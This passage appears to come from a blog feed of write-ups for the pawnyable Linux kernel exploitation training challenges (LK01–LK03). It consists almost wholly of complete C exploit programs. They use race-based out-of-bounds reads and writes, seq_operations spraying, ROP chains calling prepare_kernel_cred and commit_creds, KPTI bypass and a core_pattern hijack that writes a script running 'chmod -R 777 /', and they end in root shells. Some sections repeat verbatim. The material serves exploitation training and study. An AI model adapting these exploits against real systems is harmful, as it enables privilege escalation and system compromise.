!= cur_rand_val) { break; } } if (!memcmp(tmp, data, len)) { race_success = 1; } } free(tmp); pthread_join(th, NULL); } static uint64_t kernel_base = 0; int main() { char char_buf[0x800]; uint64_t* uint64_buf = (uint64_t*)char_buf; srand(time(NULL)); save_state(); int seq_ops_spray[800] = { 0, }; for (int i = 0; i &lt; sizeof(seq_ops_spray) / sizeof(seq_ops_spray[0]) / 2; ++i) { seq_ops_spray[i] = open(&#34;/proc/self/stat&#34;, O_RDONLY); } vuln_dev_fd = open(&#34;/dev/&#34; VULN_DEV_DEVICE_NAME, O_RDONLY); if (vuln_dev_fd &lt; 0) { fatal(&#34;open &#34; VULN_DEV_DEVICE_NAME); } for (int i = sizeof(seq_ops_spray) / sizeof(seq_ops_spray[0]) / 2; i &lt; sizeof(seq_ops_spray) / sizeof(seq_ops_spray[0]); ++i) { seq_ops_spray[i] = open(&#34;/proc/self/stat&#34;, O_RDONLY); } int seq_ops_start_idx = -1; vuln_dev_oob_read(char_buf, sizeof(char_buf)); for (int i = 0; i &lt; sizeof(char_buf) / sizeof(uint64_t); ++i) { if ((uint64_buf[i] &amp; SEQ_OPERATIONS_START_OFFSET) == SEQ_OPERATIONS_START_OFFSET) { kernel_base = uint64_buf[i] - SEQ_OPERATIONS_START_OFFSET; seq_ops_start_idx = i; break; } } if (seq_ops_start_idx == -1 || kernel_base == 0 || (kernel_base &amp; 0xFFFFF) != 0) { fatal(&#34;kernel_base&#34;); } printf(&#34;[+] kernel_base: 0x%16lx @ idx: %d\n&#34;, kernel_base, seq_ops_start_idx); void* fake_stack = mmap( (void*)(FAKE_STACK_ADDRESS - 0x8000), 0x10000, PROT_READ | PROT_WRITE, MAP_POPULATE | MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0); uint64_t* rop = (uint64_t*)(FAKE_STACK_ADDRESS); *rop++ = POP_RDI; *rop++ = 0; *rop++ = PREPARE_KERNEL_CRED; *rop++ = POP_RCX; *rop++ = 0; *rop++ = MOV_RDI_RAX_REP; *rop++ = COMMIT_CREDS; *rop++ = BYPASS_KPTI; *rop++ = 0xdeadbeefcafebe01; *rop++ = 0xdeadbeefcafebe02; *rop++ = (uint64_t)(get_shell); *rop++ = (uint64_t)(user_cs); *rop++ = (uint64_t)(user_rflags); *rop++ = (uint64_t)(user_sp); *rop++ = (uint64_t)(user_ss); uint64_buf[seq_ops_start_idx] = MOV_ESP_0xf6000000; vuln_dev_oob_write(uint64_buf, 8 * (seq_ops_start_idx + 1)); for (int i = 0; i &lt; sizeof(seq_ops_spray) / sizeof(seq_ops_spray[0]); ++i) { read(seq_ops_spray[i], char_buf, 0x100); } for (int i = 0; i &lt; sizeof(seq_ops_spray) / sizeof(seq_ops_spray[0]); ++i) { close(seq_ops_spray[i]); } return 0; }</code></pre></div> <h2 id="exercise-with-smap">Exercise (with SMAP)</h2> <p>I tried writing exploit code with SMAP enabled. But I failed. I think that any registers cannot be controlled when using <a href="https://elixir.bootlin.com/linux/v5.17.1/source/include/linux/seq_file.h#L32"><code>seq_operations</code></a> to control RIP.</p> <hr> <h2 id="lk03-dexter">LK03 (Dexter)</h2> <div class="collapsable-code"> <input id="784519362" type="checkbox" checked /> <label for="784519362"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_using_seq_operations_without_smap.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;fcntl.h&gt; #include &lt;pthread.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/mman.h&gt; #include &lt;unistd.h&gt; #define VULN_DEV_DEVICE_NAME &#34;dexter&#34; #define VULN_DEV_BUFFER_SIZE 0x20 #define VULN_DEV_CMD_GET 0xdec50001 #define VULN_DEV_CMD_SET 0xdec50002 #define KERNEL_BASE 0xffffffff81000000 #define SEQ_OPERATIONS_START 0xffffffff81170f80 #define SEQ_OPERATIONS_START_OFFSET (SEQ_OPERATIONS_START - KERNEL_BASE) #define FAKE_STACK_ADDRESS (0xf6000000) #define MOV_ESP_0xf6000000_OFFSET (0xffffffff81520224 - KERNEL_BASE) #define MOV_ESP_0xf6000000 (kernel_base + MOV_ESP_0xf6000000_OFFSET) #define POP_RDI_OFFSET (0xffffffff8109b0cd - KERNEL_BASE) #define POP_RDI (kernel_base + POP_RDI_OFFSET) #define PREPARE_KERNEL_CRED_OFFSET (0xffffffff810729b0 - KERNEL_BASE) #define PREPARE_KERNEL_CRED (kernel_base + PREPARE_KERNEL_CRED_OFFSET) #define POP_RCX_OFFSET (0xffffffff8110d88b - KERNEL_BASE) #define POP_RCX (kernel_base + POP_RCX_OFFSET) #define MOV_RDI_RAX_REP_OFFSET (0xffffffff8163d0ab - KERNEL_BASE) #define MOV_RDI_RAX_REP (kernel_base + MOV_RDI_RAX_REP_OFFSET) #define COMMIT_CREDS_OFFSET (0xffffffff81072810 - KERNEL_BASE) #define COMMIT_CREDS (kernel_base + COMMIT_CREDS_OFFSET) #define BYPASS_KPTI_OFFSET \ (0xffffffff81800e26 - \ KERNEL_BASE) // Offset in the function // swapgs_restore_regs_and_return_to_usermode #define BYPASS_KPTI (kernel_base + BYPASS_KPTI_OFFSET) static void fatal(const char* msg) { perror(msg); exit(-1); } uint64_t user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); printf( &#34;[*] user_cs: 0x%016lx, user_ss: 0x%016lx, user_sp: 0x%016lx, &#34; &#34;user_rflags: &#34; &#34;0x%016lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); } static void get_shell() { puts(&#34;[+] Get shell!&#34;); char* argv[] = {&#34;/bin/sh&#34;, NULL}; char* envp[] = {NULL}; execve(&#34;/bin/sh&#34;, argv, envp); } typedef struct { char* ptr; size_t len; } request_t; static int vuln_dev_fd = -1; static request_t vuln_dev_req = { 0, }; static int vuln_dev_set(void* ptr, size_t len) { vuln_dev_req.ptr = ptr; vuln_dev_req.len = len; return ioctl(vuln_dev_fd, VULN_DEV_CMD_SET, &amp;vuln_dev_req); } static int vuln_dev_get(void* ptr, size_t len) { vuln_dev_req.ptr = ptr; vuln_dev_req.len = len; return ioctl(vuln_dev_fd, VULN_DEV_CMD_GET, &amp;vuln_dev_req); } static int race_success = 0; static void* vuln_dev_race(void* arg) { const size_t len = (size_t)arg; while (!race_success) { vuln_dev_req.len = len; usleep(1); } return NULL; } static void vuln_dev_oob_read(void* out, size_t len) { if (len &lt;= VULN_DEV_BUFFER_SIZE) { vuln_dev_get(out, len); return; } pthread_t th; race_success = 0; const uint64_t cur_rand_val = 0xdeadbeefcafebebe + rand(); *(uint64_t*)(out + VULN_DEV_BUFFER_SIZE) = cur_rand_val; pthread_create(&amp;th, NULL, &amp;vuln_dev_race, (void*)len); while (!race_success) { if (vuln_dev_get(out, VULN_DEV_BUFFER_SIZE)) { continue; } if (*(uint64_t*)(out + VULN_DEV_BUFFER_SIZE) != cur_rand_val) { race_success = 1; } } pthread_join(th, NULL); } static void vuln_dev_oob_write(void* data, size_t len) { if (len &lt;= VULN_DEV_BUFFER_SIZE) { vuln_dev_set(data, len); return; } pthread_t th; race_success = 0; const uint64_t cur_rand_val = 0xdeadbeefcafebebe + rand(); void* tmp = malloc(len); *(uint64_t*)(tmp + VULN_DEV_BUFFER_SIZE) = cur_rand_val; pthread_create(&amp;th, NULL, &amp;vuln_dev_race, (void*)len); while (!race_success) { if (vuln_dev_set(data, VULN_DEV_BUFFER_SIZE)) { continue; } while (1) { if (vuln_dev_get(tmp, VULN_DEV_BUFFER_SIZE)) { continue; } if (*(uint64_t*)(tmp + VULN_DEV_BUFFER_SIZE) != cur_rand_val) { break; } } if (!memcmp(tmp, data, len)) { race_success = 1; } } free(tmp); pthread_join(th, NULL); } static uint64_t kernel_base = 0; int main() { char char_buf[0x800]; uint64_t* uint64_buf = (uint64_t*)char_buf; srand(time(NULL)); save_state(); int seq_ops_spray[800] = { 0, }; for (int i = 0; i &lt; sizeof(seq_ops_spray) / sizeof(seq_ops_spray[0]) / 2; ++i) { seq_ops_spray[i] = open(&#34;/proc/self/stat&#34;, O_RDONLY); } vuln_dev_fd = open(&#34;/dev/&#34; VULN_DEV_DEVICE_NAME, O_RDONLY); if (vuln_dev_fd &lt; 0) { fatal(&#34;open &#34; VULN_DEV_DEVICE_NAME); } for (int i = sizeof(seq_ops_spray) / sizeof(seq_ops_spray[0]) / 2; i &lt; sizeof(seq_ops_spray) / sizeof(seq_ops_spray[0]); ++i) { seq_ops_spray[i] = open(&#34;/proc/self/stat&#34;, O_RDONLY); } int seq_ops_start_idx = -1; vuln_dev_oob_read(char_buf, sizeof(char_buf)); for (int i = 0; i &lt; sizeof(char_buf) / sizeof(uint64_t); ++i) { if ((uint64_buf[i] &amp; SEQ_OPERATIONS_START_OFFSET) == SEQ_OPERATIONS_START_OFFSET) { kernel_base = uint64_buf[i] - SEQ_OPERATIONS_START_OFFSET; seq_ops_start_idx = i; break; } } if (seq_ops_start_idx == -1 || kernel_base == 0 || (kernel_base &amp; 0xFFFFF) != 0) { fatal(&#34;kernel_base&#34;); } printf(&#34;[+] kernel_base: 0x%16lx @ idx: %d\n&#34;, kernel_base, seq_ops_start_idx); void* fake_stack = mmap( (void*)(FAKE_STACK_ADDRESS - 0x8000), 0x10000, PROT_READ | PROT_WRITE, MAP_POPULATE | MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0); uint64_t* rop = (uint64_t*)(FAKE_STACK_ADDRESS); *rop++ = POP_RDI; *rop++ = 0; *rop++ = PREPARE_KERNEL_CRED; *rop++ = POP_RCX; *rop++ = 0; *rop++ = MOV_RDI_RAX_REP; *rop++ = COMMIT_CREDS; *rop++ = BYPASS_KPTI; *rop++ = 0xdeadbeefcafebe01; *rop++ = 0xdeadbeefcafebe02; *rop++ = (uint64_t)(get_shell); *rop++ = (uint64_t)(user_cs); *rop++ = (uint64_t)(user_rflags); *rop++ = (uint64_t)(user_sp); *rop++ = (uint64_t)(user_ss); uint64_buf[seq_ops_start_idx] = MOV_ESP_0xf6000000; vuln_dev_oob_write(uint64_buf, 8 * (seq_ops_start_idx + 1)); for (int i = 0; i &lt; sizeof(seq_ops_spray) / sizeof(seq_ops_spray[0]); ++i) { read(seq_ops_spray[i], char_buf, 0x100); } for (int i = 0; i &lt; sizeof(seq_ops_spray) / sizeof(seq_ops_spray[0]); ++i) { close(seq_ops_spray[i]); } return 0; }</code></pre></div> <h2 id="exercise-with-smap">Exercise (with SMAP)</h2> <p>I tried writing exploit code with SMAP enabled. But I failed. I think that any registers cannot be controlled when using <a href="https://elixir.bootlin.com/linux/v5.17.1/source/include/linux/seq_file.h#L32"><code>seq_operations</code></a> to control RIP.</p> <p>My inference to exploit with SMAP:</p> <ol> <li>Find <code>kmalloc-32</code> object containing reference count</li> <li>Using heap overflow, make UAF object.</li> <li>Do cross-cache attack and exploit UAF.</li> </ol> <p>Or just find a good <code>kmalloc-32</code> object with RIP controll primitives with register controll or AAW primitives, ETC. But I cannot find the good object&hellip;</p> <p>Currently, I does not know what is cross-cache attack and how SLUB works. Therefore I decide to delay solving this exercise until I study SLUB and cross-cache attack, ETC.</p> <h2 id="reference">Reference</h2> <ul> <li><a href="https://pawnyable.cafe/linux-kernel/LK03/double_fetch.html">https://pawnyable.cafe/linux-kernel/LK03/double_fetch.html</a></li> </ul> /posts/kernel/pawnyable/pawnyable_lk02/ Thu, 09 Jan 2025 14:17:52 +0000 /posts/kernel/pawnyable/pawnyable_lk02/ <hr> <h2 id="lk02-angus">LK02 (Angus)</h2> <div class="collapsable-code"> <input id="167243895" type="checkbox" checked /> <label for="167243895"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_with_core_pattern.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;fcntl.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/mman.h&gt; #include &lt;sys/param.h&gt; #define VULN_DEVICE_NAME &#34;angus&#34; #define VULN_DEVICE_MAX_LEN 0x1000 #define VULN_CMD_INIT 0x13370001 #define VULN_CMD_SETKEY 0x13370002 #define VULN_CMD_SETDATA 0x13370003 #define VULN_CMD_GETDATA 0x13370004 #define VULN_CMD_ENCRYPT 0x13370005 #define VULN_CMD_DECRYPT 0x13370006 #define KERNEL_BASE_START 0xffffffff81000000 #define KERNEL_BASE_END 0xffffffffc0000000 #define CORE_PATTERN_OFFSET (0xeb1820) static void fatal(const char *msg) { perror(msg); exit(-1); } typedef struct { char *key; char *data; size_t keylen; size_t datalen; } XorCipher; typedef struct { char *ptr; size_t len; } request_t; int vuln_dev_fd = -1; static uint64_t vuln_dev_init() { request_t req = {.ptr = NULL, .len = 0}; return ioctl(vuln_dev_fd, VULN_CMD_INIT, &amp;req); } static uint64_t vuln_dev_setkey(void *key, size_t key_len) { request_t req = {.ptr = key, .len = key_len}; return ioctl(vuln_dev_fd, VULN_CMD_SETKEY, &amp;req); } static uint64_t vuln_dev_setdata(void *data, size_t data_len) { request_t req = {.ptr = data, .len = data_len}; return ioctl(vuln_dev_fd, VULN_CMD_SETDATA, &amp;req); } static uint64_t vuln_dev_getdata(void *out, size_t out_len) { request_t req = {.ptr = out, .len = out_len}; return ioctl(vuln_dev_fd, VULN_CMD_GETDATA, &amp;req); } static uint64_t vuln_dev_xor() { request_t req = {.ptr = NULL, .len = 0}; return ioctl(vuln_dev_fd, VULN_CMD_ENCRYPT, &amp;req); } static void *fake_xor_cipher_mem = (void *)-1; const size_t fake_xor_cipher_mem_size = 0x2000; static XorCipher *fake_xor_cipher = (void *)-1; static XorCipher *make_fake_xor_cipher() { fake_xor_cipher_mem = mmap(0, fake_xor_cipher_mem_size, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_POPULATE | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (fake_xor_cipher_mem &lt; 0) { fatal(&#34;mmap&#34;); } fake_xor_cipher = (XorCipher *)fake_xor_cipher_mem; return fake_xor_cipher; } static void AAR(void *out, uint64_t addr, size_t len) { fake_xor_cipher-&gt;data = (void *)addr; fake_xor_cipher-&gt;datalen = len; vuln_dev_getdata(out, len); } static uint64_t AAR64(uint64_t addr) { uint64_t ret = 0; AAR(&amp;ret, addr, 8); return ret; } static void AAW(const void *data, uint64_t addr, size_t len) { uint8_t *val = (uint8_t *)(fake_xor_cipher_mem + VULN_DEVICE_MAX_LEN); const uint8_t *src = (const void *)data; fake_xor_cipher-&gt;key = val; while (len != 0) { const size_t step_len = MIN(VULN_DEVICE_MAX_LEN, len); AAR(val, addr, step_len); for (int i = 0; i &lt; step_len; ++i) { val[i] ^= *src++; } fake_xor_cipher-&gt;data = (void *)addr; fake_xor_cipher-&gt;datalen = step_len; fake_xor_cipher-&gt;keylen = step_len; vuln_dev_xor(); addr += step_len; len -= step_len; } } static void AAW64(uint64_t addr, uint64_t val) { AAW(&amp;val, addr, 8); } static uint64_t leak_kernel_base() { for (uint64_t addr = KERNEL_BASE_START; addr &lt;= KERNEL_BASE_END; addr += 0x100000) { uint64_t val = AAR64(addr); if (val == 0x4800e03f51258d48) { return addr; } } return (uint64_t)-1; } int main() { vuln_dev_fd = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDONLY); if (vuln_dev_fd &lt; 0) { fatal(&#34;open vuln_dev&#34;); } make_fake_xor_cipher(); uint64_t kernel_base = leak_kernel_base(); if (kernel_base == (uint64_t)-1) { fatal(&#34;kernel_base&#34;); } printf(&#34;[+] kernel_base: %p\n&#34;, (void *)kernel_base); printf(&#34;[*] core_pattern: %p\n&#34;, (void *)(kernel_base + CORE_PATTERN_OFFSET)); system(&#34;echo -e &#39;#!/bin/sh\nchmod -R 777 /&#39; &gt; /tmp/evil.sh&#34;); system(&#34;chmod +x /tmp/evil.sh&#34;); const char kCorePattern[] = &#34;|/tmp/evil.sh&#34;; const size_t kCorePatternLen = strlen(kCorePattern); AAW(kCorePattern, kernel_base + CORE_PATTERN_OFFSET, kCorePatternLen); system(&#34;ulimit -c unlimited&#34;); uint64_t *evil_ptr = (uint64_t *)0xdeadbeefcafebebe; *evil_ptr = 0xdeadbeefcafebebe; munmap(fake_xor_cipher_mem, fake_xor_cipher_mem_size); return 0; }</code></pre></div> <h2 id="reference">Reference</h2> <ul> <li><a href="https://pawnyable.cafe/linux-kernel/LK02/null_ptr_deref.html">https://pawnyable.cafe/linux-kernel/LK02/null_ptr_deref.html</a></li> </ul> <hr> <h2 id="lk02-angus">LK02 (Angus)</h2> <div class="collapsable-code"> <input id="167243895" type="checkbox" checked /> <label for="167243895"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_with_core_pattern.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;fcntl.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/mman.h&gt; #include &lt;sys/param.h&gt; #define VULN_DEVICE_NAME &#34;angus&#34; #define VULN_DEVICE_MAX_LEN 0x1000 #define VULN_CMD_INIT 0x13370001 #define VULN_CMD_SETKEY 0x13370002 #define VULN_CMD_SETDATA 0x13370003 #define VULN_CMD_GETDATA 0x13370004 #define VULN_CMD_ENCRYPT 0x13370005 #define VULN_CMD_DECRYPT 0x13370006 #define KERNEL_BASE_START 0xffffffff81000000 #define KERNEL_BASE_END 0xffffffffc0000000 #define CORE_PATTERN_OFFSET (0xeb1820) static void fatal(const char *msg) { perror(msg); exit(-1); } typedef struct { char *key; char *data; size_t keylen; size_t datalen; } XorCipher; typedef struct { char *ptr; size_t len; } request_t; int vuln_dev_fd = -1; static uint64_t vuln_dev_init() { request_t req = {.ptr = NULL, .len = 0}; return ioctl(vuln_dev_fd, VULN_CMD_INIT, &amp;req); } static uint64_t vuln_dev_setkey(void *key, size_t key_len) { request_t req = {.ptr = key, .len = key_len}; return ioctl(vuln_dev_fd, VULN_CMD_SETKEY, &amp;req); } static uint64_t vuln_dev_setdata(void *data, size_t data_len) { request_t req = {.ptr = data, .len = data_len}; return ioctl(vuln_dev_fd, VULN_CMD_SETDATA, &amp;req); } static uint64_t vuln_dev_getdata(void *out, size_t out_len) { request_t req = {.ptr = out, .len = out_len}; return ioctl(vuln_dev_fd, VULN_CMD_GETDATA, &amp;req); } static uint64_t vuln_dev_xor() { request_t req = {.ptr = NULL, .len = 0}; return ioctl(vuln_dev_fd, VULN_CMD_ENCRYPT, &amp;req); } static void *fake_xor_cipher_mem = (void *)-1; const size_t fake_xor_cipher_mem_size = 0x2000; static XorCipher *fake_xor_cipher = (void *)-1; static XorCipher *make_fake_xor_cipher() { fake_xor_cipher_mem = mmap(0, fake_xor_cipher_mem_size, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_POPULATE | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (fake_xor_cipher_mem &lt; 0) { fatal(&#34;mmap&#34;); } fake_xor_cipher = (XorCipher *)fake_xor_cipher_mem; return fake_xor_cipher; } static void AAR(void *out, uint64_t addr, size_t len) { fake_xor_cipher-&gt;data = (void *)addr; fake_xor_cipher-&gt;datalen = len; vuln_dev_getdata(out, len); } static uint64_t AAR64(uint64_t addr) { uint64_t ret = 0; AAR(&amp;ret, addr, 8); return ret; } static void AAW(const void *data, uint64_t addr, size_t len) { uint8_t *val = (uint8_t *)(fake_xor_cipher_mem + VULN_DEVICE_MAX_LEN); const uint8_t *src = (const void *)data; fake_xor_cipher-&gt;key = val; while (len != 0) { const size_t step_len = MIN(VULN_DEVICE_MAX_LEN, len); AAR(val, addr, step_len); for (int i = 0; i &lt; step_len; ++i) { val[i] ^= *src++; } fake_xor_cipher-&gt;data = (void *)addr; fake_xor_cipher-&gt;datalen = step_len; fake_xor_cipher-&gt;keylen = step_len; vuln_dev_xor(); addr += step_len; len -= step_len; } } static void AAW64(uint64_t addr, uint64_t val) { AAW(&amp;val, addr, 8); } static uint64_t leak_kernel_base() { for (uint64_t addr = KERNEL_BASE_START; addr &lt;= KERNEL_BASE_END; addr += 0x100000) { uint64_t val = AAR64(addr); if (val == 0x4800e03f51258d48) { return addr; } } return (uint64_t)-1; } int main() { vuln_dev_fd = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDONLY); if (vuln_dev_fd &lt; 0) { fatal(&#34;open vuln_dev&#34;); } make_fake_xor_cipher(); uint64_t kernel_base = leak_kernel_base(); if (kernel_base == (uint64_t)-1) { fatal(&#34;kernel_base&#34;); } printf(&#34;[+] kernel_base: %p\n&#34;, (void *)kernel_base); printf(&#34;[*] core_pattern: %p\n&#34;, (void *)(kernel_base + CORE_PATTERN_OFFSET)); system(&#34;echo -e &#39;#!/bin/sh\nchmod -R 777 /&#39; &gt; /tmp/evil.sh&#34;); system(&#34;chmod +x /tmp/evil.sh&#34;); const char kCorePattern[] = &#34;|/tmp/evil.sh&#34;; const size_t kCorePatternLen = strlen(kCorePattern); AAW(kCorePattern, kernel_base + CORE_PATTERN_OFFSET, kCorePatternLen); system(&#34;ulimit -c unlimited&#34;); uint64_t *evil_ptr = (uint64_t *)0xdeadbeefcafebebe; *evil_ptr = 0xdeadbeefcafebebe; munmap(fake_xor_cipher_mem, fake_xor_cipher_mem_size); return 0; }</code></pre></div> <h2 id="reference">Reference</h2> <ul> <li><a href="https://pawnyable.cafe/linux-kernel/LK02/null_ptr_deref.html">https://pawnyable.cafe/linux-kernel/LK02/null_ptr_deref.html</a></li> </ul> /posts/kernel/pawnyable/pawnyable_lk01/ Wed, 08 Jan 2025 08:36:10 +0000 /posts/kernel/pawnyable/pawnyable_lk01/ <hr> <h2 id="lk01-1-holstein-v1-stack-overflow">LK01-1 (Holstein v1: Stack Overflow)</h2> <div class="collapsable-code"> <input id="376251498" type="checkbox" checked /> <label for="376251498"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_without_any_mitigation.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;fcntl.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;unistd.h&gt; #define USER_LOG 1 #define VULN_DEVICE_NAME &#34;holstein&#34; #define VULN_BUFFER_SIZE 0x400 #define PREPARE_KERNEL_CRED 0xffffffff8106e240 #define COMMIT_CREDS 0xffffffff8106e390 uint64_t user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); #if USER_LOG == 1 printf( &#34;[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: &#34; &#34;0x%lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); #endif } static void get_shell() { char* argv[] = {&#34;/bin/sh&#34;, NULL}; char* envp[] = {NULL}; puts(&#34;[+] Get shell!&#34;); execve(&#34;/bin/sh&#34;, argv, envp); } static void restore_state() { asm volatile( &#34;swapgs;\n&#34; &#34;mov qword ptr [rsp+0x20], %[u_ss];\n&#34; &#34;mov qword ptr [rsp+0x18], %[u_sp];\n&#34; &#34;mov qword ptr [rsp+0x10], %[u_rflags];\n&#34; &#34;mov qword ptr [rsp+0x08], %[u_cs];\n&#34; &#34;mov qword ptr [rsp+0x00], %[u_ret];\n&#34; &#34;iretq;\n&#34; ::[u_cs] &#34;r&#34;(user_cs), [u_ss] &#34;r&#34;(user_ss), [u_sp] &#34;r&#34;(user_sp), [u_rflags] &#34;r&#34;(user_rflags), [u_ret] &#34;r&#34;(get_shell)); } static void escalate_privilege() { void* (*prepare_kernel_cred)(int) = (void*)(PREPARE_KERNEL_CRED); void (*commit_creds)(char*) = (void*)(COMMIT_CREDS); commit_creds(prepare_kernel_cred(0)); restore_state(); } int main() { char buf[2 * VULN_BUFFER_SIZE] = {0}; int fd = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (fd &lt; 0) { return -1; } save_state(); { memset(buf, &#39;A&#39;, VULN_BUFFER_SIZE); uint64_t* rop_buf = (uint64_t*)(buf + VULN_BUFFER_SIZE); *rop_buf++ = 0xdeadbeefcafebebe; *rop_buf++ = (uint64_t)(escalate_privilege); } write(fd, buf, VULN_BUFFER_SIZE + 0x10); return 0; }</code></pre></div> <div class="collapsable-code"> <input id="197268534" type="checkbox" checked /> <label for="197268534"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_with_kaslr.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;fcntl.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;unistd.h&gt; #define USER_LOG 1 #define VULN_DEVICE_NAME &#34;holstein&#34; #define VULN_BUFFER_SIZE 0x400 #define KERNEL_BASE 0xffffffff81000000 #define PREPARE_KERNEL_CRED_OFFSET (0xffffffff8106e240 - KERNEL_BASE) #define PREPARE_KERNEL_CRED (kernel_base + PREPARE_KERNEL_CRED_OFFSET) #define COMMIT_CREDS_OFFSET (0xffffffff8106e390 - KERNEL_BASE) #define COMMIT_CREDS (kernel_base + COMMIT_CREDS_OFFSET) uint64_t kernel_base; uint64_t user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); #if USER_LOG == 1 printf( &#34;[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: &#34; &#34;0x%lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); #endif } static void get_shell() { char* argv[] = {&#34;/bin/sh&#34;, NULL}; char* envp[] = {NULL}; puts(&#34;[+] Get shell!&#34;); execve(&#34;/bin/sh&#34;, argv, envp); } static void restore_state() { asm volatile( &#34;swapgs;\n&#34; &#34;mov qword ptr [rsp+0x20], %[u_ss];\n&#34; &#34;mov qword ptr [rsp+0x18], %[u_sp];\n&#34; &#34;mov qword ptr [rsp+0x10], %[u_rflags];\n&#34; &#34;mov qword ptr [rsp+0x08], %[u_cs];\n&#34; &#34;mov qword ptr [rsp+0x00], %[u_ret];\n&#34; &#34;iretq;\n&#34; ::[u_cs] &#34;r&#34;(user_cs), [u_ss] &#34;r&#34;(user_ss), [u_sp] &#34;r&#34;(user_sp), [u_rflags] &#34;r&#34;(user_rflags), [u_ret] &#34;r&#34;(get_shell)); } static void escalate_privilege() { void* (*prepare_kernel_cred)(int) = (void*)(PREPARE_KERNEL_CRED); void (*commit_creds)(char*) = (void*)(COMMIT_CREDS); commit_creds(prepare_kernel_cred(0)); restore_state(); } static __attribute__((naked)) void get_kernel_base_and_escalate_privilege() { asm(&#34;mov %[k_base], qword ptr [rsp];\n&#34; : [k_base] &#34;=r&#34;(kernel_base)); kernel_base -= 0x1506B9; asm(&#34;jmp %[escalate_privilege];\n&#34; : : [escalate_privilege] &#34;i&#34;(escalate_privilege)); } int main() { char buf[2 * VULN_BUFFER_SIZE] = {0}; int fd = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (fd &lt; 0) { return -1; } save_state(); { memset(buf, &#39;A&#39;, VULN_BUFFER_SIZE); uint64_t* rop_buf = (uint64_t*)(buf + VULN_BUFFER_SIZE); *rop_buf++ = 0xdeadbeefcafebebe; *rop_buf++ = (uint64_t)(get_kernel_base_and_escalate_privilege); } write(fd, buf, VULN_BUFFER_SIZE + 0x10); return 0; }</code></pre></div> <div class="collapsable-code"> <input id="462381597" type="checkbox" checked /> <label for="462381597"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_with_smep_smap.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;fcntl.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;unistd.h&gt; #define USER_LOG 1 #define VULN_DEVICE_NAME &#34;holstein&#34; #define VULN_BUFFER_SIZE 0x400 #define POP_RDI 0xffffffff8127bbdc #define PREPARE_KERNEL_CRED 0xffffffff8106e240 #define XOR_RCX_RCX 0xffffffff810abef0 #define MOV_RDI_RAX_REP 0xffffffff8160c96b #define COMMIT_CREDS 0xffffffff8106e390 #define SWAPGS 0xffffffff8160bf7e #define IRETQ 